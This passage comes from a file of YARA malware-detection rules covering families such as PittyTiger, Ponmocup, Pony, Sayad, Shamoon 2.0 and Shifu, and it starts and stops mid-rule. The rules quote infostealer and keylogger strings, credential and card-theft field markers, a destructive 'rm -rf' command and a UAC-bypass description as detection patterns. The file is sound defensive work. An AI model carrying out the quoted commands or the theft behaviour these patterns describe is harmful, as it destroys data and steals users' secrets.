    $s43 = ".svkp" ascii wide
    $s44 = "Themida" ascii wide
    $s45 = ".Themida" ascii wide
    $s46 = ".packed" ascii wide
    $s47 = ".Upack" ascii wide
    $s48 = ".ByDwing" ascii wide
    $s49 = "UPX0" ascii wide
    $s50 = "UPX1" ascii wide
    $s51 = "UPX2" ascii wide
    $s52 = ".UPX0" ascii wide
    $s53 = ".UPX1" ascii wide
    $s54 = ".UPX2" ascii wide
    $s55 = ".vmp0" ascii wide
    $s56 = ".vmp1" ascii wide
    $s57 = ".vmp2" ascii wide
    $s58 = "VProtect" ascii wide
    $s59 = "WinLicen" ascii wide
    $s60 = "WWPACK" ascii wide
    $s61 = ".yP" ascii wide
    $s62 = ".y0da" ascii wide
    $s63 = "UPX!" ascii wide
  condition:
    uint16(0) == 23117 and uint32be(uint32(60)) == 1346699264 and (for any of them : ($ in (0..1024)))
}

rule PittyTiger {
  meta:
    author = " (@chort0)"
    description = "Detect PittyTiger Trojan via common strings"
  strings:
    $ptUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)"
    $ptFC001 = "FC001" fullword
    $ptPittyTiger = "PittyTiger" fullword
    $trjHTMLerr = "trj:HTML Err." nocase fullword
    $trjworkFunc = "trj:workFunc start." nocase fullword
    $trjcmdtout = "trj:cmd time out." nocase fullword
    $trjThrtout = "trj:Thread time out." nocase fullword
    $trjCrPTdone = "trj:Create PT done." nocase fullword
    $trjCrPTerr = "trj:Create PT error: mutex already exists." nocase fullword
    $oddPippeFailed = "Create Pippe Failed!" fullword
    $oddXferingFile = "Transfering File" fullword
    $oddParasError = "put Paras Error:" fullword
    $oddCmdTOutkilled = "Cmd Time Out..Cmd has been killed." fullword
  condition:
    (any of ($pt*)) and (any of ($trj*)) and (any of ($odd*))
}

rule PolishBankRAT_srservice_xorloop {
  meta:
    author = "Booz Allen Hamilton Dark Labs"
    description = "Finds the custom xor decode loop for <PolishBankRAT_srservice>"
  strings:
    $loop = { 48 8B CD E8 60 FF FF FF 48 FF C3 32 44 1E FF 48 FF CF 88 43 FF }
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and $loop
}

rule PolishBankRAT_fdsvc_xor_loop {
  meta:
    author = "Booz Allen Hamilton Dark Labs"
    description = "Finds the custom xor decode loop for <PolishBankRAT_fdsvc>"
  strings:
    $loop = { 0F B6 42 FF 48 8D 52 FF 30 42 01 FF CF 75 F1 }
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and $loop
}

rule PolishBankRAT_fdsvc_decode2 {
  meta:
    author = "Booz Allen Hamilton Dark Labs"
    description = "Find a constant used as part of a payload decoding function in PolishBankRAT_fdsvc"
  strings:
    $part1 = { A6 EB 96 }
    $part2 = { 61 B2 E2 EF }
    $part3 = { 0D CB E8 C4 }
    $part4 = { 5A F1 66 9C }
    $part5 = { A4 80 CD 9A }
    $part6 = { F1 2F 46 25 }
    $part7 = { 2F DB 16 26 }
    $part8 = { 4B C4 3F 3C }
    $str1 = "This program cannot be run in DOS mode"
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule decoded_PolishBankRAT_fdsvc_strings {
  meta:
    author = "Booz Allen Hamilton Dark Labs"
    description = "Finds hard coded strings in PolishBankRAT_fdsvc"
  strings:
    $str1 = "ssylka" ascii wide
    $str2 = "ustanavlivat" ascii wide
    $str3 = "poluchit" ascii wide
    $str4 = "pereslat" ascii wide
    $str5 = "derzhat" ascii wide
    $str6 = "vykhodit" ascii wide
    $str7 = "Nachalo" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and 4 of ($str*)
}

rule Ponmocup : plugins memory {
  meta:
    description = "Ponmocup plugin detection (memory)"
    author = "Danny Heppener, Fox-IT"
    reference = "https://foxitsecurity.files.wordpress.com/2015/12/foxit-whitepaper_ponmocup_1_1.pdf"
  strings:
    $1100 = { 4D 5A 90 [29] 4C 04 }
    $1201 = { 4D 5A 90 [29] B1 04 }
    $1300 = { 4D 5A 90 [29] 14 05 }
    $1350 = { 4D 5A 90 [29] 46 05 }
    $1400 = { 4D 5A 90 [29] 78 05 }
    $1402 = { 4D 5A 90 [29] 7A 05 }
    $1403 = { 4D 5A 90 [29] 7B 05 }
    $1404 = { 4D 5A 90 [29] 7C 05 }
    $1405 = { 4D 5A 90 [29] 7D 05 }
    $1406 = { 4D 5A 90 [29] 7E 05 }
    $1500 = { 4D 5A 90 [29] DC 05 }
    $1501 = { 4D 5A 90 [29] DD 05 }
    $1502 = { 4D 5A 90 [29] DE 05 }
    $1505 = { 4D 5A 90 [29] E1 05 }
    $1506 = { 4D 5A 90 [29] E2 05 }
    $1507 = { 4D 5A 90 [29] E3 05 }
    $1508 = { 4D 5A 90 [29] E4 05 }
    $1509 = { 4D 5A 90 [29] E5 05 }
    $1510 = { 4D 5A 90 [29] E6 05 }
    $1511 = { 4D 5A 90 [29] E7 05 }
    $1512 = { 4D 5A 90 [29] E8 05 }
    $1600 = { 4D 5A 90 [29] 40 06 }
    $1601 = { 4D 5A 90 [29] 41 06 }
    $1700 = { 4D 5A 90 [29] A4 06 }
    $1800 = { 4D 5A 90 [29] 08 07 }
    $1801 = { 4D 5A 90 [29] 09 07 }
    $1802 = { 4D 5A 90 [29] 0A 07 }
    $1803 = { 4D 5A 90 [29] 0B 07 }
    $2001 = { 4D 5A 90 [29] D1 07 }
    $2002 = { 4D 5A 90 [29] D2 07 }
    $2003 = { 4D 5A 90 [29] D3 07 }
    $2004 = { 4D 5A 90 [29] D4 07 }
    $2500 = { 4D 5A 90 [29] C4 09 }
    $2501 = { 4D 5A 90 [29] C5 09 }
    $2550 = { 4D 5A 90 [29] F6 09 }
    $2600 = { 4D 5A 90 [29] 28 0A }
    $2610 = { 4D 5A 90 [29] 32 0A }
    $2700 = { 4D 5A 90 [29] 8C 0A }
    $2701 = { 4D 5A 90 [29] 8D 0A }
    $2750 = { 4D 5A 90 [29] BE 0A }
    $2760 = { 4D 5A 90 [29] C8 0A }
    $2810 = { 4D 5A 90 [29] FA 0A }
  condition:
    any of ($1100, $1201, $1300, $1350, $1400, $1402, $1403, $1404, $1405, $1406, $1500, $1501, $1502, $1505, $1506, $1507, $1508, $1509, $1510, $1511, $1512, $1600, $1601, $1700, $1800, $1801, $1802, $1803, $2001, $2002, $2003, $2004, $2500, $2501, $2550, $2600, $2610, $2700, $2701, $2750, $2760, $2810)
}

rule Trj_Ponmocup {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    description = "Ponmocup Installer"
  strings:
    $mz = { 4D 5A }
    $pac = { 48 8F BB 54 5F 3E 4F 4E }
    $unp = { 8B B8 7C 1F 46 00 33 C8 }
  condition:
    ($mz at 0) and ($pac at 401276) and ($unp at 10736)
}

rule Trj_Ponmocup_Downloader {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    description = "Ponmocup Downloader"
  strings:
    $mz = { 4D 5A }
    $vb5 = "VB5" ascii fullword
    $tpb = "www.thepiratebay.org" wide fullword
    $ua = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1)" wide fullword
  condition:
    ($mz at 0) and ($vb5) and ($tpb) and ($ua)
}

rule Trj_Ponmocup_dll {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    description = "Ponmocup Bot DLL"
  strings:
    $mz = { 4D 5A }
    $pck = { 00 81 23 00 33 3E 00 00 3B F4 56 00 00 00 7D 00 }
    $upk = { 68 F4 14 00 10 A1 6C C0 02 10 FF D0 59 59 E9 7A }
  condition:
    ($mz at 0) and ($pck at 35408) and ($upk at 1567)
}

rule pony {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-08-16"
    description = "Identify Pony"
  strings:
    $s1 = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}"
    $s2 = "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0"
    $s3 = "POST %s HTTP/1.0"
    $s4 = "Accept-Encoding: identity, *;q=0"
  condition:
    $s1 and $s2 and $s3 and $s4
}

rule Predator_The_Thief : Predator_The_Thief {
  meta:
    description = "Yara rule for Predator The Thief v2.3.5 & +"
    author = "Fumik0_"
    date = "2018/10/12"
    source = "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/"
  strings:
    $mz = { 4D 5A }
    $hex1 = { BF 00 00 40 06 }
    $hex2 = { C6 04 31 6B }
    $hex3 = { C6 04 31 63 }
    $hex4 = { C6 04 31 75 }
    $hex5 = { C6 04 31 66 }
    $s1 = "sqlite_" ascii wide
  condition:
    $mz at 0 and all of ($hex*) and all of ($s*)
}

rule PubSabCode : PubSab Family {
  meta:
    description = "PubSab code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
  condition:
    any of them
}

rule PubSabStrings : PubSab Family {
  meta:
    description = "PubSab Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $ = "_deamon_init"
    $ = "com.apple.PubSabAgent"
    $ = "/tmp/screen.jpeg"
  condition:
    any of them
}

rule PubSab : Family {
  meta:
    description = "PubSab"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  condition:
    PubSabCode or PubSabStrings
}

rule MALW_PurpleWave_v1 {
  meta:
    Description = "Generic rule to identify PurpleWave v1.0"
    Author = "Xylitol <xylitol@temari.fr>"
    date = "2020-08-01"
    reference = "https://twitter.com/3xp0rtblog/status/1289125217751781376"
    hash1 = "7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df"
    hash2 = "76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304"
    hash3 = "832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd"
    hash4 = "917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9"
    hash5 = "a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16"
    hash6 = "d5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161"
    hash7 = "d820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9"
    hash8 = "d4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554"
    hash9 = "4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d"
  strings:
    $MZ = { 4D 5A }
    $decoderoutine = { 8B 45 E8 33 C9 8A 04 07 28 04 1A 42 83 FF 07 8D 47 01 0F 45 C8 8B F9 3B D6 7C E5 }
    $string1 = " at t.me/LuckyStoreSupport |" wide fullword
    $string2 = "][aes_key]" ascii wide
    $string3 = "][passwords][" ascii wide
    $string4 = "][is_encrypted]" ascii wide
    $string5 = "][cards][" ascii wide
    $string6 = "][number]" ascii wide
    $string7 = "][domain]" ascii wide
    $string8 = "][cookies][" ascii wide
    $string9 = "][flag]" ascii wide
    $string10 = "][histories][" ascii wide
    $string11 = "D877F783D5D3EF8C" ascii wide
    $alphabet1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    $alphabet2 = "0123456789abcdefghijklmnopqrstuvwxyz"
  condition:
    ($MZ at 0 and $decoderoutine) and ((5 of ($string*) and all of ($alphabet*))) and filesize < 716800
}

rule MALW_FakePyPI {
  meta:
    description = "Identifies fake PyPI Packages."
    author = "@bartblaze"
    reference = "http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/"
    date = "2017-09"
    tlp = "white"
  strings:
    $ = "# Welcome Here! :)"
    $ = "# just toy, no harm :)"
    $ = "[0x76,0x21,0xfe,0xcc,0xee]"
  condition:
    all of them
}

rule PE_File_pyinstaller {
  meta:
    author = "Didier Stevens (https://DidierStevens.com)"
    description = "Detect PE file produced by pyinstaller"
    reference = "https://isc.sans.edu/diary/21057"
  strings:
    $a = "pyi-windows-manifest-filename"
  condition:
    pe.number_of_resources > 0 and $a
}

rule MachO_File_pyinstaller {
  meta:
    author = "KatsuragiCSL (https://katsuragicsl.github.io)"
    description = "Detect Mach-O file produced by pyinstaller"
  strings:
    $a = "pyi-runtime-tmpdir"
    $b = "pyi-bootloader-ignore-signals"
  condition:
    any of them
}

rule QuarianStrings : Quarian Family {
  meta:
    description = "Quarian Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    $ = "s061779s061750"
    $ = "[OnUpLoadFile]"
    $ = "[OnDownLoadFile]"
    $ = "[FileTransfer]"
    $ = "---- Not connect the Manager, so start UnInstall ----"
    $ = "------- Enter CompressDownLoadDir ---------"
    $ = "------- Enter DownLoadDirectory ---------"
    $ = "[HandleAdditionalData]"
    $ = "[mswsocket.dll]"
    $ = "msupdate.dll........Enter ThreadCmd!"
    $ = "ok1-1"
    $ = "msupdate_tmp.dll"
    $ = "replace Rpcss.dll successfully!"
    $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
    $ = "\\drivercashe\\" ascii wide
    $ = "\\microsoft\\windwos\\" ascii wide
    $ = "\\DosDevices\\LOADHIDDENDRIVER" ascii wide
    $ = "\\Device\\LOADHIDDENDRIVER" ascii wide
    $ = "Global\\state_maping" ascii wide
    $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
    $ = "Global\\unInstall_event_1554_Ower" ascii wide
  condition:
    any of them
}

rule QuarianCode : Quarian Family {
  meta:
    description = "Quarian code features"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
    $ = { C1 EF 05 C1 E3 04 33 FB }
    $ = { 33 D8 81 EE 47 86 C8 61 }
    $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
  condition:
    any of them
}

rule Quarian : Family {
  meta:
    description = "Quarian"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  condition:
    QuarianCode or QuarianStrings
}

private rule is__str_Rebirth_gen3 {
  meta:
    description = "Generic detection for Vulcan branch Rebirth or Katrina from Torlus nextgen"
    reference = "https://imgur.com/a/SSKmu"
    reference = "https://www.reddit.com/r/LinuxMalware/comments/7rprnx/vulcan_aka_linuxrebirth_or_katrina_variant_of/"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-01-21"
  strings:
    $str01 = "/usr/bin/python" ascii wide nocase fullword
    $str02 = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" ascii wide nocase fullword
    $str03 = "Telnet Range %d->%d" ascii wide nocase fullword
    $str04 = "Mirai Range %d->%d" ascii wide nocase fullword
    $str05 = "[Updating] [%s:%s]" ascii wide nocase fullword
    $str06 = "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" ascii wide nocase fullword
    $str07 = "\x1B[96m[DEVICE] \x1B[97mConnected" ascii wide nocase fullword
  condition:
    4 of them
}

private rule is__hex_Rebirth_gen3 {
  meta:
    author = "unixfreaxjp"
    date = "2018-01-21"
  strings:
    $hex01 = { 0D C0 A0 E1 00 D8 2D E9 }
    $hex02 = { 3C 1C 00 06 27 9C 97 98 }
    $hex03 = { 94 21 EF 80 7C 08 02 A6 }
    $hex04 = { E6 2F 22 4F 76 91 18 3F }
    $hex05 = { 06 00 1C 3C 20 98 9C 27 }
    $hex06 = { 55 89 E5 81 EC ?? 10 00 }
    $hex07 = { 55 48 89 E5 48 81 EC 90 }
    $hex08 = { 6F 67 69 6E 00 }
  condition:
    2 of them
}

private rule is__bot_Rebirth_gen3 {
  meta:
    author = "unixfreaxjp"
    date = "2018-01-21"
  strings:
    $bot01 = "MIRAITEST" ascii wide nocase fullword
    $bot02 = "TELNETTEST" ascii wide nocase fullword
    $bot03 = "UPDATE" ascii wide nocase fullword
    $bot04 = "PHONE" ascii wide nocase fullword
    $bot05 = "RANGE" ascii wide nocase fullword
    $bot06 = "KILLATTK" ascii wide nocase fullword
    $bot07 = "STD" ascii wide nocase fullword
    $bot08 = "BCM" ascii wide nocase fullword
    $bot09 = "NETIS" ascii wide nocase fullword
    $bot10 = "FASTLOAD" ascii wide nocase fullword
  condition:
    6 of them
}

rule MALW_Rebirth_Vulcan_ELF {
  meta:
    description = "Detects Rebirth Vulcan variant a torlus NextGen MALW"
    description = "Just adjust or omit below two strings for next version they code :) @unixfreaxjp"
    date = "2018-01-21"
  strings:
    $spec01 = "vulcan.sh" ascii wide nocase fullword
    $spec02 = "Vulcan" ascii wide nocase fullword
  condition:
    all of them and is__elf and is__str_Rebirth_gen3 and is__hex_Rebirth_gen3 and is__bot_Rebirth_gen3 and filesize < 307200
}

rule RegSubDatCode : RegSubDat Family {
  meta:
    description = "RegSubDat code features"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    $ = { 80 34 3? 99 40 ( 3D FB 65 00 00 | 3B C6 ) 7? F? }
    $ = { 68 FF FF 7F 00 5? }
    $ = { 68 FF 7F 00 00 5? }
  condition:
    all of them
}

rule RegSubDatStrings : RegSubDat Family {
  meta:
    description = "RegSubDat Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    $avg1 = "Button"
    $avg2 = "Allow"
    $avg3 = "Identity Protection"
    $avg4 = "Allow for all"
    $avg5 = "AVG Firewall Asks For Confirmation"
    $mutex = "0x1A7B4C9F"
  condition:
    all of ($avg*) or $mutex
}

rule RegSubDat : Family {
  meta:
    description = "RegSubDat"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  condition:
    RegSubDatCode or RegSubDatStrings
}

rule rar_with_js {
  strings:
    $h1 = "Rar!"
    $s1 = ".js" nocase
  condition:
    $h1 at 0 and $s1
}

rule RockLoader {
  meta:
    name = "RockLoader"
    description = "RockLoader Malware"
    author = "@seanmw"
  strings:
    $hdr = { 4D 5A 90 00 }
    $op1 = { 39 45 F0 0F 8E B0 00 00 00 }
    $op2 = { 32 03 77 73 70 72 69 6E 74 66 41 00 CE 02 53 65 }
  condition:
    $hdr at 0 and all of ($op*) and filesize < 512000
}

rule rovnix_downloader : downloader {
  meta:
    author = "Intel Security"
    description = "Rovnix downloader with sinkhole checks"
    reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
  strings:
    $sink1 = "control"
    $sink2 = "sink"
    $sink3 = "hole"
    $sink4 = "dynadot"
    $sink5 = "block"
    $sink6 = "malw"
    $sink7 = "anti"
    $sink8 = "googl"
    $sink9 = "hack"
    $sink10 = "trojan"
    $sink11 = "abuse"
    $sink12 = "virus"
    $sink13 = "black"
    $sink14 = "spam"
    $boot = "BOOTKIT_DLL.dll"
    $mz = { 4D 5A }
  condition:
    $mz in (0..2) and all of ($sink*) and $boot
}

rule SafeNetCode : SafeNet Family {
  meta:
    description = "SafeNet code features"
    author = "Seth Hardy"
    last_modified = "2014-07-16"
  strings:
    $ = { 83 C7 14 81 FF F8 D0 40 00 }
  condition:
    any of them
}

rule SafeNetStrings : SafeNet Family {
  meta:
    description = "Strings used by SafeNet"
    author = "Seth Hardy"
    last_modified = "2014-07-16"
  strings:
    $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
    $ = "/safe/record.php"
    $ = "_Rm.bat" ascii wide
    $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" ascii wide
    $ = "Ext.org" ascii wide
  condition:
    any of them
}

rule SafeNet : Family {
  meta:
    description = "SafeNet family"
  condition:
    SafeNetCode or SafeNetStrings
}

rule Sakurel_backdoor {
  meta:
    maltype = "Sakurel backdoor"
    ref = "https://github.com/reed1713"
    reference = "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Sakurel.A#tab=2"
    description = "malware creates a process in the temp directory and performs the sysprep UAC bypass method."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "Windows\\System32\\sysprep\\sysprep.exe" nocase
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" nocase
  condition:
    all of them
}

rule Vinsula_Sayad_Binder : infostealer binder {
  meta:
    Author = "Vinsula, Inc"
    Date = "2014/06/20"
    Description = "Sayad Infostealer Binder"
    Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
  strings:
    $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdb"
    $delphinativestr = "DelphiNative.dll" nocase
    $sqlite3str = "sqlite3.dll" nocase
    $winexecstr = "WinExec"
    $sayadconfig = "base.dll" wide
  condition:
    all of them
}

rule Vinsula_Sayad_Client : infostealer {
  meta:
    Author = "Vinsula, Inc"
    Date = "2014/06/20"
    Description = "Sayad Infostealer Client"
    Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
  strings:
    $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb"
    $sayadconfig = "base.dll" wide
    $sqlite3str = "sqlite3.dll" nocase
    $debugstr01 = "Config loaded" wide
    $debugstr02 = "Config parsed" wide
    $debugstr03 = "storage uploader" wide
    $debugstr04 = "updater" wide
    $debugstr05 = "keylogger" wide
    $debugstr06 = "Screenshot" wide
    $debugstr07 = "sqlite found & start collectiong data" wide
    $debugstr08 = "Machine info collected" wide
    $debugstr09 = "browser ok" wide
    $debugstr10 = "messenger ok" wide
    $debugstr11 = "vpn ok" wide
    $debugstr12 = "ftp client ok" wide
    $debugstr13 = "ftp server ok" wide
    $debugstr14 = "rdp ok" wide
    $debugstr15 = "kerio ok" wide
    $debugstr16 = "skype ok" wide
    $debugstr17 = "serialize data ok" wide
    $debugstr18 = "Keylogged" wide
  condition:
    all of them
}

rule ScarhiknStrings : Scarhikn Family {
  meta:
    description = "Scarhikn Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "9887___skej3sd"
    $ = "haha123"
  condition:
    any of them
}

rule ScarhiknCode : Scarhikn Family {
  meta:
    description = "Scarhikn code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
    $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
  condition:
    any of them
}

rule Scarhikn : Family {
  meta:
    description = "Scarhikn"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    ScarhiknCode or ScarhiknStrings
}

rule sendsafe {
  meta:
    author = " J from THL <j@techhelplist.com>"
    date = "2016/09"
    reference = "http://pastebin.com/WPWWs406"
    version = 2
    maltype = "Spammer"
    filetype = "memory"
  strings:
    $a = "Enterprise Mailing Service"
    $b = "Blacklisted by rule: %s:%s"
    $c = "/SuccessMails?CampaignNum=%ld"
    $d = "/TimedOutMails?CampaignNum=%ld"
    $e = "/InvalidMails?CampaignNum=%ld"
    $f = "Failed to download maillist, retrying"
    $g = "No maillist loaded"
    $h = "Successfully sent using SMTP account %s (%d of %ld messages to %s)"
    $i = "Successfully sent %d of %ld messages to %s"
    $j = "Sending to %s in the same connection"
    $k = "New connection required, will send to %s"
    $l = "Mail transaction for %s is over."
    $m = "Domain %s is bad (found in cache)"
    $n = "Domain %s found in cache"
    $o = "Domain %s isn't found in cache, resolving it"
    $p = "All tries to resolve %s failed."
    $q = "Failed to receive response for %s from DNS server"
    $r = "Got DNS server response: domain %s is bad"
    $s = "Got error %d in response for %s from DNS server"
    $t = "MX's IP for domain %s found in cache:"
    $u = "Timeout waiting for domain %s to be resolved"
    $v = "No valid MXes for domain %s. Marking it as bad"
    $w = "Resolving MX %s using existing connection to DNS server"
    $x = "All tries to resolve MX for %s are failed"
    $y = "Resolving MX %s using DNS server"
    $z = "Failed to receive response for MX %s from DNS server"
  condition:
    13 of them
}

rule CrowdStrike_Shamoon_DroppedFile {
  meta:
    description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
    reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
  strings:
    $testn123 = "test123" wide
    $testn456 = "test456" wide
    $testn789 = "test789" wide
    $testdomain = "testdomain.com" wide
    $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
  condition:
    (any of ($testn*) or $pingcmd) and $testdomain
}

rule Shamoon2_Wiper {
  meta:
    description = "Detects Shamoon 2.0 Wiper Component"
    author = "Florian Roth"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
    hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
  strings:
    $a1 = "\\??\\%s\\System32\\%s.exe" wide fullword
    $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
    $s1 = "UFWYNYNTS" wide fullword
    $s2 = "\\\\?\\ElRawDisk" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 2 of them) or (3 of them)
}

rule Shamoon2_ComComp {
  meta:
    description = "Detects Shamoon 2.0 Communication Components"
    author = "Florian Roth (with Binar.ly)"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
  strings:
    $s1 = "mkdir %s%s > nul 2>&1" ascii fullword
    $s2 = "p[%s%s%d.%s" ascii fullword
    $op1 = { 04 32 CB 88 04 37 88 4C 37 01 88 54 37 02 83 C6 }
    $op2 = { C8 02 D2 C0 E9 06 02 D2 24 3F 02 D1 88 45 FB 8D }
    $op3 = { 0C 3B 40 8D 4E 01 47 3B C1 7C D8 83 FE 03 7D 1C }
  condition:
    uint16(0) == 23117 and filesize < 512000 and (all of ($s*) or all of ($op*))
}

rule EldoS_RawDisk {
  meta:
    description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
    author = "Florian Roth (with Binar.ly)"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 50
    hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
    hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
  strings:
    $s1 = "g\\system32\\" wide fullword
    $s2 = "ztvttw" wide fullword
    $s3 = "lwizvm" ascii fullword
    $s4 = "FEJIKC" ascii fullword
    $s5 = "INZQND" ascii fullword
    $s6 = "IUTLOM" wide fullword
    $s7 = "DKFKCK" ascii fullword
    $op1 = { 94 35 77 73 03 40 EB E9 }
    $op2 = { 80 7C 41 01 00 74 0A 3D }
    $op3 = { 74 0A 3D 00 94 35 77 }
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 4 of them)
}

rule Shamoon_Disttrack_Dropper {
  meta:
    description = "Detects Shamoon 2.0 Disttrack Dropper"
    author = "Florian Roth"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6"
    hash2 = "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a"
  strings:
    $a1 = "\\#{9A6DB7D2-FECF-41ff-9A92-6EDA696613DF}#" wide
    $a2 = "\\#{8A6DB7D2-FECF-41ff-9A92-6EDA696613DE}#" wide
    $s1 = "\\amd64\\elrawdsk.pdb" ascii fullword
    $s2 = "RawDiskSample.exe" wide fullword
    $s3 = "RawDisk Driver. Allows write access to files and raw disk sectors for user mode applications in Windows 2000 and later." wide fullword
    $s4 = "elrawdsk.sys" wide fullword
    $s5 = "\\DosDevices\\ElRawDisk" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 92160 and 1 of ($a*) and 1 of ($s*))
}

rule Shifu_Banking_Trojan_0 : banking {
  meta:
    description = "Detects Shifu Banking Trojan"
    author = "Florian Roth"
    reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
    date = "2015-09-01"
    hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
    hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
  strings:
    $x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" ascii fullword
    $s1 = "listen above" wide fullword
    $s2 = "familycould cost" wide fullword
    $s3 = "SetSystemTimeAdjustment" ascii fullword
    $s4 = "PeekNamedPipe" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and ($x1 or all of ($s*))
}

rule SHIFU_Banking_Trojan_1 : banking {
  meta:
    description = "Detects SHIFU Banking Trojan"
    author = "Florian Roth"
    reference = "http://goo.gl/52n8WE"
    date = "2015-10-31"
    score = 70
